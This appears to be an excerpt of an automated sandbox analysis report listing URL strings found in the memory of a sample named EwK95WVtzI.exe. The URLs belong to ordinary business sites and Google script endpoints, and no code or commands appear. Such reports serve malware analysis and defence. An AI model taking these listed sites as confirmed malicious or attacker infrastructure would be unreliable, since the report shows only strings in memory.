                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-json/wp/v2/pages/2
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/xmlrpc.php?rsd
                Source: EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1990007266.0000000007E80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.fcwcvt.org/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/api.js?render=6LdeMu0ZAAAAAFtmpTrTqJfRdq-yIJmXMOBmYWGU&ver=3.0
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/api.js?render=explicit&ver=3.3.1
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=G-CDTYFWBRBX
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-181916817-1
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-MLLZCHF
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1452531175.0000000007A80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1980163682.0000000007980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.gpthink.com
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.gzs.si/o_gzs
                Source: EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1501880576.0000000003D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.jacomfg.com/
                Source: EwK95WVtzI.exe, 00000000.00000002.2785021069.0000000007780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.jenco.co.uk/xWx
                Source: EwK95WVtzI.exe, 00000000.00000003.1460752026.0000000007980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.kernsafe.com/
